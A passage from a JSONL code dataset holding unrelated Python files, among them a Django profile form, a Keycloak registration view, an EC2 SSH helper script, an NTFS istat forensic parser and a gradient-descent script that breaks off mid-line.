error_message)\n\n def test_invalid_path_is_used_in_pt_br(self):\n result = self.pyccuracy.run_tests(file_pattern=\"test_wait_for_element_error_pt-br.acc\",\n should_throw=False,\n default_culture=\"pt-br\",\n report_file_name=\"invalidurlreport.html\")\n\n assert result.status == 'FAILED'\n assert result.failed_scenarios == 1\n error_message = str(result.stories[0].scenarios[0].whens[0].error)\n expected_message = u\"A ação de esperar a página carregar não foi executada com sucesso após um timeout de 10000 milisegundos.\"\n assert error_message == expected_message, \"Expected different than actual:\\n\\nExpected:'%s'\\nActual: '%s'\" % (expected_message, error_message)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_wait_for_element_error.py","file_name":"test_wait_for_element_error.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"318031702","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\n\nimport jinja2\nimport six\n\n\ndef render_values(mapping=None, context=None):\n \"\"\"\n Render an incoming mapping using context provided in context using Jinja2. Returns a dict\n containing rendered mapping.\n\n :param mapping: Input as a dictionary of key value pairs.\n :type mapping: ``dict``\n\n :param context: Context to be used for dictionary.\n :type context: ``dict``\n\n :rtype: ``dict``\n \"\"\"\n\n if not context or not mapping:\n return mapping\n\n env = jinja2.Environment(undefined=jinja2.StrictUndefined)\n rendered_mapping = {}\n for k, v in six.iteritems(mapping):\n # jinja2 works with string so transform list and dict to strings.\n reverse_json_dumps = False\n if isinstance(v, dict) or isinstance(v, list):\n v = json.dumps(v)\n reverse_json_dumps = True\n else:\n v = str(v)\n rendered_v = env.from_string(v).render(context)\n # no change therefore no templatization so pick params from original to retain\n # original type\n if rendered_v == v:\n rendered_mapping[k] = mapping[k]\n continue\n if reverse_json_dumps:\n rendered_v = json.loads(rendered_v)\n rendered_mapping[k] = rendered_v\n return rendered_mapping\n","sub_path":"st2common/st2common/util/jinja.py","file_name":"jinja.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347829696","text":"\nimport paramiko\n\nkey = paramiko.RSAKey.from_private_key_file('/home/bridgeit/Downloads/vinitkeypair.pem')\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n# Connect/ssh to an instance\ntry:\n # Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2\n client.connect(hostname='13.127.37.241', username=\"ubuntu\", pkey=key)\n\n # Execute a command(cmd) after connecting/ssh to an instance\n #stdin, stdout, stderr = client.exec_command('ls ./folder1')\n stdin, stdout, stderr = client.exec_command('aws s3 cp s3://vinn/h.html /home/ubuntu/folder1/h1.html')\n print(stdout.read())\n\n # close the client connection once the job is done\n client.close()\n\n\nexcept BaseException as e:\n print(e)","sub_path":"PythAws/rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"220323595","text":"from django import forms\r\nfrom .models import Profile,User\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom crispy_forms.helper import FormHelper\r\nfrom PIL import Image\r\nfrom django.core.files import File\r\n\r\nclass SignUpForm(UserCreationForm):\r\n Choice= ((None,'Select gender'),('M','Male'), ('F','Female'),('O','Other'), )\r\n first_name = forms.CharField(max_length=30, required=False)\r\n last_name = forms.CharField(max_length=30, required=False)\r\n email = forms.EmailField(max_length=254)\r\n birth_date = forms.DateField()\r\n gender = forms.ChoiceField(choices=Choice)\r\n country = forms.CharField(max_length='100')\r\n\r\n class Meta:\r\n model = User\r\n fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2','gender','country' )\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(SignUpForm, self).__init__(*args, **kwargs)\r\n self.helper = FormHelper(self)\r\n\r\nclass ProfileForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n fields = ('image','country', 'city','state','fullAddress')\r\n\r\n\r\n\r\n\r\nclass PhotoForm(forms.ModelForm):\r\n x = forms.FloatField(widget=forms.HiddenInput())\r\n y = forms.FloatField(widget=forms.HiddenInput())\r\n width = forms.FloatField(widget=forms.HiddenInput())\r\n height = forms.FloatField(widget=forms.HiddenInput())\r\n\r\n class Meta:\r\n model = Profile\r\n fields = ('image', 'x', 'y', 'width', 'height', )\r\n\r\n def save(self):\r\n profile = super(PhotoForm, self).save()\r\n\r\n x = self.cleaned_data.get('x')\r\n y = self.cleaned_data.get('y')\r\n w = self.cleaned_data.get('width')\r\n h = self.cleaned_data.get('height')\r\n\r\n image = Image.open(Profile.image)\r\n cropped_image = image.crop((x, y, w+x, h+y))\r\n resized_image = cropped_image.resize((200, 200), Image.ANTIALIAS)\r\n resized_image.save(profile.image.path)\r\n\r\n return profile","sub_path":"social/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"310165790","text":"\"\"\"\nAuthor: Jim Culbert\nCopyright (c) 2021 MGHPCC\nAll rights reserved. No warranty, explicit or implicit, provided.\n\"\"\"\n\nimport requests\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom .utils import get_user_confirmation\nfrom ..models import AccountAction\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef validate(request):\n regcode = request.GET.get('regcode', None)\n\n data = {}\n if regcode is None:\n logmsg = \"No regcode supplied. Cannot complete registration.\"\n logger.warn(logmsg)\n data[\"error\"] = logmsg\n else:\n try:\n pending_account_action = AccountAction.objects.get(\n regcode=regcode\n )\n except AccountAction.DoesNotExist:\n logmsg = f\"Unrecognized registration code {regcode}\"\n logger.warn(logmsg)\n data[\"error\"] = logmsg\n pending_account_action = None\n\n if pending_account_action is not None:\n opcode = pending_account_action.opcode\n\n api_endpoint = (\n f\"{settings.MSS_KC_SERVER}/auth/admin/realms/\"\n f\"{settings.MSS_KC_REALM}/users\"\n )\n\n headers = {\n 'Authorization': f\"Bearer {request.client_token}\",\n 'Content-Type': 'application/json'\n }\n\n data[\"firstName\"] = pending_account_action.firstName\n data[\"lastName\"] = pending_account_action.lastName\n data[\"email\"] = pending_account_action.email\n data[\"username\"] = pending_account_action.username\n data[\"emailVerified\"] = True\n data[\"enabled\"] = True\n\n # UPDATE (EMAIL CHANGED)\n # Update email was accepted\n # convert to a normal pending update\n # and validate with user at new address\n if opcode == 'update_verify_new_email':\n logger.debug(\n f\"User {pending_account_action.username} accepted email \"\n f\"change to {pending_account_action.email}. Proceding to \"\n \"verify new address.\"\n )\n http_verb = None\n pending_account_action.opcode = 'update'\n pending_account_action.save()\n\n get_user_confirmation(\n pending_account_action,\n pending_account_action.email\n )\n\n # UPDATE (NO EMAIL CHANGE)\n elif opcode == 'update':\n http_verb = 'PUT'\n if pending_account_action.sub != \"\":\n api_endpoint = (\n f\"{api_endpoint}/{pending_account_action.sub}\"\n )\n else:\n logmsg = \"Update action must specify a subject\"\n logger.error(logmsg)\n raise RuntimeError(logmsg)\n\n # CREATE\n else:\n http_verb = 'POST'\n idp_link = {\n 'identityProvider': 'cilogon',\n 'userId': pending_account_action.linked_sub,\n 'userName': pending_account_action.username\n }\n data['federatedIdentities'] = [idp_link]\n data['attributes'] = {\n 'cilogon_idp_name': pending_account_action.linked_idp_name\n }\n\n # MAKE CHAGES IF CREATE OR UPDATE (NO EMAIL CHANGE)\n # Email change cause additional validation email...\n if http_verb is not None:\n try:\n r = requests.request(\n http_verb,\n api_endpoint,\n json=data,\n headers=headers\n )\n\n if r.ok:\n logger.info(\n f\"Acocunt {opcode} completed successfully for \"\n f\"subject {pending_account_action.sub}.\"\n )\n pending_account_action.delete()\n\n else:\n server_error = r.json()['errorMessage']\n logger.error(\n f\"Error in account {opcode} for sub \"\n f\"{pending_account_action.sub}. server returned \"\n f\"{server_error}.\"\n )\n data['error'] = server_error\n\n except requests.exceptions.RequestException as re:\n logmsg = (\n f\"Error with account {opcode} for \"\n f\"{pending_account_action.sub} A problem occurred \"\n f\"communicating with the server. {re}\"\n )\n logger.debug(logmsg)\n data['error'] = logmsg\n\n except requests.exceptions.JSONDecodeError as decode_error:\n logger.debug(\n f\"Error decoding server response. {decode_error}\"\n )\n data['error'] = \"Unknown error.\"\n\n except Exception:\n logger.error(\n f\"An unknown error occurred while performing \"\n f\"account {opcode} for sub \"\n f\"{pending_account_action.sub}\"\n )\n data['error'] = \"Unknown error.\"\n\n # Have to set after sending request because server\n # does not recognize option \"opcode\"\n data['opcode'] = opcode\n\n return render(\n request,\n template_name='regapp/validate.j2',\n context={'account_action': data}\n )\n","sub_path":"apps/regapp/views/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"114254140","text":"from requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\n\nEXAMPLE_EVENTS = [{\n 'summary': 'Test',\n 'description': 'Good food wow',\n \"location\": 'Danciger B', # free form\n 'start': {'dateTime': '2018-05-06T13:00:00',\n 'timeZone': 'Asia/Jerusalem'},\n 'end': {'dateTime': '2018-05-06T16:00:00',\n 'timeZone': 'Asia/Jerusalem'},\n}]\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n print('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns true if the response seems to be HTML, false otherwise\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef to_google_format(date_time):\n \"\"\"\n Formats a given datetime to the format required by google calendar.\n \"\"\"\n try:\n return date_time.strftime('%Y-%m-%dT%H:%M:%S')\n except BaseException:\n return ''\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"47234358","text":"import math\nimport unittest\n\ndef wallis(i):\n piestim=1\n for j in range(1,i+1):\n t=((4*j*j)/((4*j*j)-1))\n piestim=piestim*t\n return (2*piestim)\n\nfrom random import *\ndef monte_carlo(i):\n nodescircle=0\n nodessquare=0\n for j in range(i):\n x=random()\n y=random()\n if(x*x+y*y)<=1:\n nodescircle+=1\n nodessquare+=1\n else :\n nodessquare+=1\n return (4*nodescircle/nodessquare)\nclass TestWallis(unittest.TestCase):\n def test_low_iters(self):\n for i in range(0, 5):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) > 0.15, msg=f\"Estimate with just {i} iterations is {pi} which is too accurate.\\n\")\n \n def test_high_iters(self):\n for i in range(500, 600):\n pi = wallis(i)\n self.assertTrue(abs(pi - math.pi) < 0.01, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n\n\nclass TestMC(unittest.TestCase):\n def test_randomness(self):\n pi0 = monte_carlo(15000)\n pi1 = monte_carlo(15000)\n \n self.assertNotEqual(pi0, pi1, \"Two different estimates for PI are exactly the same. This is almost impossible.\")\n\n self.assertFalse(abs(pi0 - pi1) > 0.05, \"Two different estimates of PI are too different. This should not happen\")\n\n def test_accuracy(self):\n for i in range(500, 600):\n pi = monte_carlo(i)\n self.assertTrue(abs(pi - math.pi) < 0.4, msg=f\"Estimate with even {i} iterations is {pi} which is not accurate enough.\\n\")\n \n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"estimate.py","file_name":"estimate.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"153603714","text":"def sum_n(n):\n if n == 0:\n return 0\n return n+sum_n(n-1)\n\nprint(sum_n(3))\n\n\nprint(\"Довгаль Ірина\\n КМ-83\\nвариант 4\")\nprint(\" Функція - Parse(s,t). \"\n \"Призначення - поділ рядка s на дві частини: до першого входження символу t і після нього. \\n\\n\")\na =input(\"введіть рядок\")\nb =input(\"введіть літеру\")\ndef Parse(s, t):\n print(s[0:s.find(t)])\n print(s[s.find(t):])\n return \"finish\"\n\nif b in a:\n Parse(a,b)\nelse:\n print(\"символу немає у рядку\")\n\n\n##\n","sub_path":"km-83/Dovgal_Iryna/workshop1/homework/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"60930083","text":"from whelk import *\nimport unittest\nimport sys, os\n\nPY3 = sys.version_info[0] == 3\nif PY3:\n b = lambda x: x.encode('latin-1')\nelse:\n b = lambda x: x\nos.environ['PATH'] = os.pathsep.join([\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bin'),\n os.environ['PATH']\n])\n","sub_path":"whelk/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"421483547","text":"#\n# @lc app=leetcode id=55 lang=python3\n#\n# [55] Jump Game\n#\n\n# @lc code=start\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n res = 0\n for i in range(len(nums) - 2, -1, -1):\n if nums[i] > res:\n res = 0\n else:\n res += 1\n return res == 0\n\n# @lc code=end\n","sub_path":"55.jump-game.py","file_name":"55.jump-game.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"424502284","text":"import datetime\nimport struct\n\n\ndef as_signed_le(bs):\n if len(bs) <= 0 or len(bs) > 8:\n raise ValueError()\n\n signed_format = {1: 'b', 2: 'h', 4: 'l', 8: 'q'}\n\n fill = b'\\xFF' if ((bs[-1] & 0x80) >> 7) == 1 else b'\\x00'\n\n while len(bs) not in signed_format:\n bs = bs + fill\n\n return struct.unpack('<' + signed_format[len(bs)], bs)[0]\n\n#bytes per sector\ndef get_sector_size(fs_bytes):\n return as_signed_le(fs_bytes[11:13])\n\n#bytes per cluster\ndef get_cluster_size(fs_bytes):\n return as_signed_le(fs_bytes[13:14]) * get_sector_size(fs_bytes)\n\n#cluster # of first MFT\ndef get_first_mft_cluster(fs_bytes):\n return as_signed_le(fs_bytes[48:56]) #to get decimal offset of first MFT, multiply by get_cluster_size( )\n\n#mft entry size (in bytes)\ndef get_mft_entry_size(fs_bytes):\n size = as_signed_le(fs_bytes[64:65])\n if size < 0:\n return 2 ** abs(size)\n return size * get_cluster_size(fs_bytes)\n\ndef get_first_attribute_offset(mft_bytes):\n return as_signed_le(mft_bytes[20:22])\n\ndef get_attribute_header(mft_bytes, attribute_offset):\n start = attribute_offset\n return mft_bytes[start:start+16]\n\ndef get_attribute_type(attribute_header):\n return as_signed_le(attribute_header[0:4])\n\n#in bytes already\ndef get_attribute_size(attribute_header):\n return as_signed_le(attribute_header[4:8])\n\ndef get_attribute_non_resident_flag(attribute_header):\n return as_signed_le(attribute_header[8:9])\n\n\ndef istat_ntfs(f, address, sector_size=512, offset=0):\n\n data = f.read()\n # if offset != 0:\n # data = data[offset * sector_size:len(data)]\n # f.seek((offset+32) * sector_size + address * 1024)\n # mft_entry = f.read(1024)\n result = []\n\n sector_per_cluster = get_cluster_size(data) / sector_size #get_sector_size(data)\n\n mft_length = get_mft_entry_size(data)\n mft_start_sector = get_first_mft_cluster(data) * sector_per_cluster\n mft_offset = ((offset + int(mft_start_sector)) * sector_size + address * mft_length)\n\n #mft entry bytes data\n mft_entry = data[mft_offset:mft_offset+mft_length]\n\n #Fixup array\n # fixup_offset = as_signed_le(mft_entry[4:6])\n # fixup_num_entries = as_signed_le(mft_entry[6:8])\n # fixup_arr = mft_entry[fixup_offset:2*fixup_num_entries+fixup_offset]\n # fixup_index = 0\n\n # print('fixup: ', fixup_arr)\n # print('sec 1: ', mft_entry[sector_size-2: sector_size])\n # print('sec 2: ', mft_entry[sector_size*2 - 2: sector_size*2])\n # print('sec 3: ', mft_entry[sector_size*3 - 2: sector_size*3])\n # for i in range(fixup_num_entries):\n # print('before: ', mft_entry[(i+1)*sector_size-2:(i+1)*sector_size])\n # mft_entry = mft_entry[i*sector_size:i*sector_size+(sector_size-2)] + fixup_arr[fixup_index:fixup_index+2] + mft_entry[(i+1)*sector_size:]\n # fixup_index += 2\n # print('after: ', mft_entry[(i + 1) * sector_size - 2:(i + 1) * sector_size])\n\n #how to get fixup array?\n\n #MFT Entry Header Values\n result.append('MFT Entry Header Values:')\n result.append('Entry: {} Sequence: {}'.format(address, as_signed_le(mft_entry[16:18]))) #Spacing Error?\n result.append('$LogFile Sequence Number: {}'.format(as_signed_le(mft_entry[8:16])))\n result.append('Allocated File')\n result.append('Links: {}'.format(as_signed_le(mft_entry[18:20])))\n result.append('')\n\n\n #$STANDARD_INFORMATION Attribute Values:\n std_info_attr = retrieve_attribute(mft_entry, 16)\n #print('std info length: ', len(std_info_attr))\n #std_info_attr_header = get_attribute_header(std_info_attr, 0)\n std_info_content_offset = as_signed_le(std_info_attr[20:22])\n std_info_attr_content = std_info_attr[std_info_content_offset:]\n std_info_flag = as_signed_le(std_info_attr_content[32:36])\n std_info_flag_type = ''\n std_info_content_size = as_signed_le(std_info_attr[16:20])\n\n\n if std_info_flag & 0x0002: #what other more flags to check?\n std_info_flag_type += 'Hidden'\n if std_info_flag & 0x0020:\n std_info_flag_type += 'Archive'\n\n result.append('$STANDARD_INFORMATION Attribute Values:')\n result.append('Flags: {}'.format(std_info_flag_type))\n result.append('Owner ID: {}'.format(0))\n result.append('Created:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[0:8])))) #decode might be wrong\n result.append('File Modified:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[8:16]))))\n result.append('MFT Modified:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[16:24]))))\n result.append('Accessed:\\t{}'.format(into_localtime_string(as_signed_le(std_info_attr_content[24:32]))))\n result.append('')\n\n #$FILE_NAME Attribute Values:\n file_name_attr = retrieve_attribute(mft_entry, 48)\n file_name_content_offset = as_signed_le(file_name_attr[20:22])\n file_name_attr_content = file_name_attr[file_name_content_offset:]\n file_name_flag = as_signed_le(file_name_attr_content[56:60])\n file_name_flag_type = ''\n file_name_content_size = as_signed_le(file_name_attr[16:20])\n\n if file_name_flag & 0x0002: #what other more flags to check?\n file_name_flag_type += 'Hidden'\n if file_name_flag & 0x0020:\n file_name_flag_type += 'Archive'\n\n allocated_size = as_signed_le(file_name_attr_content[40:48])\n actual_size = as_signed_le(file_name_attr_content[48:56])\n file_name_reference = file_name_attr_content[0:8]\n parent_entry = as_signed_le(file_name_reference[:6])\n sequence = as_signed_le(file_name_reference[6:])\n\n name = file_name_attr_content[66:].decode('ascii', 'ignore').strip()\n stripped_name = ''\n for c in name:\n if 0x20 <= ord(c) <= 0x7E:\n stripped_name += c\n\n result.append('$FILE_NAME Attribute Values:')\n result.append('Flags: {}'.format(file_name_flag_type))\n result.append('Name: {}'.format(stripped_name)) #file name?\n result.append('Parent MFT Entry: {} \\tSequence: {}'.format(parent_entry, sequence))\n result.append('Allocated Size: {} \\tActual Size: {}'.format(allocated_size, actual_size))\n result.append('Created:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[8:16])))) # decode might be wrong\n result.append('File Modified:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[16:24]))))\n result.append('MFT Modified:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[24:32]))))\n result.append('Accessed:\\t{}'.format(into_localtime_string(as_signed_le(file_name_attr_content[32:40]))))\n result.append('')\n\n #Attributes:\n data_attr = retrieve_attribute(mft_entry, 128)\n data_attr_header = data_attr[:16]\n non_resident_flag = 0\n if get_attribute_non_resident_flag(data_attr_header) == 1:\n non_resident_flag = 1\n cluster_arr = []\n\n if non_resident_flag:\n runlist_offset = as_signed_le(data_attr[32:34])\n prev_offset = 0\n\n while runlist_offset < len(data_attr) and as_signed_le(data_attr[runlist_offset:runlist_offset+1]) != 0: #when to stop?\n field_byte = data_attr[runlist_offset]\n offset_field = field_byte >> 4\n mask = 0b1111\n length_field = field_byte & mask#(field_byte << 4) >> 8\n\n runlist_offset += 1\n length_value = as_signed_le(data_attr[runlist_offset:runlist_offset+length_field])\n\n runlist_offset += length_field\n offset_value = as_signed_le(data_attr[runlist_offset:runlist_offset+offset_field])\n\n start = prev_offset + offset_value\n prev_offset = start\n end = start + length_value\n while start < end:\n cluster_arr.append(start)\n start += 1\n\n runlist_offset += offset_field\n\n result.append('Attributes:')\n result.append('Type: $STANDARD_INFORMATION (16-0) Name: N/A Resident size: {}'.format(std_info_content_size))\n result.append('Type: $FILE_NAME (48-3) Name: N/A Resident size: {}'.format(file_name_content_size))\n if not non_resident_flag:\n result.append('Type: $DATA (128-2) Name: N/A Resident size: {}'.format(as_signed_le(data_attr[16:20])))\n else:\n data_actual_size = as_signed_le(data_attr[48:56])\n data_init_size = as_signed_le(data_attr[56:64])\n result.append('Type: $DATA (128-2) Name: N/A Non-Resident size: {} init_size: {}'.format(data_actual_size, data_init_size ))\n n = 0\n str = ''\n for cluster in cluster_arr:\n if n < 8:\n str += '{} '.format(cluster)\n n += 1\n else:\n result.append(str.strip())\n str = '{} '.format(cluster)\n n = 1\n if n <= 8:\n result.append(str.strip())\n\n return result\n\ndef retrieve_attribute(mft_entry, attribute_type):\n attr_offset = 56#get_first_attribute_offset(mft_entry)\n attr_header = get_attribute_header(mft_entry, attr_offset)\n attr_type = get_attribute_type(attr_header)\n attr_size = get_attribute_size(attr_header)\n attr = mft_entry[attr_offset:attr_offset+attr_size] #attribute data\n\n while (attr_type is not attribute_type) and attr_offset+attr_size < len(mft_entry):\n attr_offset = attr_offset + attr_size\n attr_header = get_attribute_header(mft_entry, attr_offset)\n attr_type = get_attribute_type(attr_header)\n attr_size = get_attribute_size(attr_header)\n attr = mft_entry[attr_offset:attr_offset+attr_size]\n\n return attr\n\n\n\n\n\n\ndef into_localtime_string(windows_timestamp):\n \"\"\"\n Convert a windows timestamp into istat-compatible output.\n\n Assumes your local host is in the EDT timezone.\n\n :param windows_timestamp: the struct.decoded 8-byte windows timestamp\n :return: an istat-compatible string representation of this time in EDT\n \"\"\"\n dt = datetime.datetime.fromtimestamp((windows_timestamp - 116444736000000000) / 10000000)\n hms = dt.strftime('%Y-%m-%d %H:%M:%S')\n fraction = windows_timestamp % 10000000\n return hms + '.' + str(fraction) + '00 (EDT)'\n\n\nif __name__ == '__main__':\n import argparse\n\n '''parser = argparse.ArgumentParser(description='Display details of a meta-data structure (i.e. inode).')\n parser.add_argument('-o', type=int, default=0, metavar='imgoffset',\n help='The offset of the file system in the image (in sectors)')\n parser.add_argument('-b', type=int, default=512, metavar='dev_sector_size',\n help='The size (in bytes) of the device sectors')\n parser.add_argument('image', help='Path to an NTFS raw (dd) image')\n parser.add_argument('address', type=int, help='Meta-data number to display stats on')\n args = parser.parse_args()'''\n #with open(args.image, 'rb') as f:\n #result = istat_ntfs(f, args.address, args.b, args.o)\n with open('image.ntfs', 'rb') as f:\n result = istat_ntfs(f, 64)\n for line in result:\n print(line.strip())","sub_path":"istat_ntfs.py","file_name":"istat_ntfs.py","file_ext":"py","file_size_in_byte":11178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"292912978","text":"import urllib.request\nimport json\n\ndef weather2text():\n\ttext = '\\n'\n\turl = 'http://weather.livedoor.com/forecast/webservice/json/v1?city=130010'\n\thtml = urllib.request.urlopen(url)\n\tresp = json.loads(html.read().decode('utf-8'))\n\n\ttext += '**************************' + '\\n'\n\ttext += resp['title'] + '\\n'\n\ttext += '**************************' + '\\n'\n\ttext += resp['description']['text'] + '\\n'\n\n\tfor forecast in resp['forecasts']:\n\t\ttext += '**************************' + '\\n'\n\t\ttext += forecast['dateLabel'] + '(' + forecast['date'] + ')' + '\\n'\n\t\ttext += forecast['telop'] + '\\n'\n\n\ttext += '**************************' + '\\n'\n\n\treturn text","sub_path":"application/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172549137","text":"import numpy as np\r\nfrom numpy import random\r\nimport matplotlib.pyplot as plt\r\n\r\n#loading input file\r\nprint(\"\\n\")\r\nuser_input = input(\"Enter your input filename with extension (ex: input.txt): \")\r\nfile_input = np.loadtxt(user_input)\r\n\r\n#defining input data\r\nprint(\"\\n\")\r\ncolumn_x = input(\"The data to predict (input x) are in column (ex: 1 or 2 or etc.): \")\r\ncolumn_y = input(\"The data to be predicted (input y) are in column (ex: 1 or 2 or etc.): \")\r\nx = np.array(file_input[:, (int(column_x) - 1)])\r\ny = np.array(file_input[:, (int(column_y) - 1)])\r\nlabel_x = input(\"The label for input x: \")\r\nlabel_y = input(\"The label for input y: \")\r\nprint(\"\\n\")\r\nprint(\"\\n\", label_x, \"\\n\", x)\r\nprint(\"\\n\", label_y, \"\\n\", y)\r\nprint(\"\\n\", \"Length of \", label_x, \": \", len(x))\r\nprint(\"\\n\", \"Length of \", label_y, \": \", len(y))\r\nprint(\"\\n\")\r\n\r\nprint(\"\\n\")\r\n#defining initial parameter\r\nslope = input(\"Input the initial guess of the slope (suggestion: 1): \")\r\nintercept = input(\"Input the initial guess of the intercept (suggestion: 0): \")\r\nlearning_rate = input(\"Input the learning rate (alpha) (suggestion: 0.01): \")\r\nminimum_gradient = input(\"Input the minimum gradient (suggestion: 0.0009): \")\r\nmaximum_iterations = input(\"Input the maximum number of iterations (suggestion: 10000): \")\r\nmini_batch = input(\"Input the number of data you want to use in the mini batch: \")\r\n\r\n#converting input to float\r\nslope = float(slope)\r\nintercept = float(intercept)\r\nlearning_rate = float(learning_rate)\r\nminimum_gradient = float(minimum_gradient)\r\nmaximum_iterations = float(maximum_iterations)\r\nmini_batch = int(mini_batch)\r\n\r\n#initial predicted line\r\nmodel_x = np.arange((min(x) - (min(x) / 10)), (max(x) + (max(x) / 10)), (len(x) / 100))\r\nmodel_y_initial = (slope * model_x) + intercept\r\n\r\neq_initial = \"Initial Line: Y = (\" + str(np.around(slope, 3)) + \")\" + \"X\" + \" + \" + \"(\" + str(np.around(intercept, 3)) + \")\"\r\n\r\n#gradient descent function, using loss function = sum square residual\r\ndef gradient_descent(x, y, slope, intercept, learning_rate, minimum_gradient, maximum_iterations, mini_batch) :\r\n iterations = 0\r\n #looping\r\n looping = \"continue\"\r\n\r\n tot_gradient_slope = []\r\n tot_gradient_intercept = []\r\n tot_slope = []\r\n tot_intercept = []\r\n tot_ssr = []\r\n\r\n while looping == \"continue\" :\r\n ssr = np.sum((y - ((slope * x) + intercept)) * (y - ((slope * x) + intercept)))\r\n \r\n x_random = []\r\n y_random = []\r\n\r\n while len(x_random) <= mini_batch :\r\n random_index = random.randint(len(x))\r\n x_random.append(x[random_index])\r\n y_random.append(y[random_index])\r\n\r\n x_random = np.array(x_random)\r\n y_random = np.array(y_random)\r\n \r\n gradient_slope = np.sum(-2 * x_random * (y_random - ((slope * x_random) + intercept)))\r\n gradient_intercept = np.sum(-2 * (y_random - ((slope * x_random) + intercept)))\r\n \r\n step_size_slope = gradient_slope * learning_rate\r\n step_size_intercept = gradient_intercept * learning_rate\r\n \r\n slope = slope - step_size_slope\r\n intercept = intercept - step_size_intercept\r\n\r\n if str(gradient_slope) == \"nan\" or str(gradient_intercept) == \"nan\" :\r\n slope = 1\r\n intercept = 0\r\n learning_rate = learning_rate / 10\r\n iterations = 0\r\n \r\n tot_gradient_slope = []\r\n tot_gradient_intercept = []\r\n tot_slope = []\r\n tot_intercept = []\r\n tot_ssr = []\r\n \r\n if abs(gradient_slope) < minimum_gradient and abs(gradient_intercept) < minimum_gradient :\r\n looping = \"stop\"\r\n elif iterations > maximum_iterations :\r\n looping = \"stop\"\r\n\r\n tot_gradient_slope.append(gradient_slope)\r\n tot_gradient_intercept.append(gradient_intercept)\r\n tot_slope.append(slope)\r\n tot_intercept.append(intercept)\r\n tot_ssr.append(ssr)\r\n\r\n iterations = iterations + 1\r\n\r\n print(\"\\n\", iterations, \"iteration(s) is done\")\r\n print(\"\\n\", \"The Sum of Square Residual (SSR): \", ssr)\r\n print(\"\\n\", \"The Gradient of The SSR and The Slope is: \", gradient_slope)\r\n print(\"\\n\", \"The Gradient of The SSR and The Intercept is: \", gradient_intercept)\r\n print(\"\\n\", \"The Slope: \", slope)\r\n print(\"\\n\", \"The Intercept: \", intercept)\r\n print(\"\\n\", \"The Learning Rate (alpha): \", learning_rate, \"\\n\")\r\n \r\n if looping == \"continue\" :\r\n print(\"\\n\", \"The Loop is Continuing . . .\")\r\n else :\r\n print(\"\\n\", \"The Loop is Stopped . . .\")\r\n \r\n return slope, intercept, gradient_slope, gradient_intercept, tot_gradient_slope, tot_gradient_intercept, 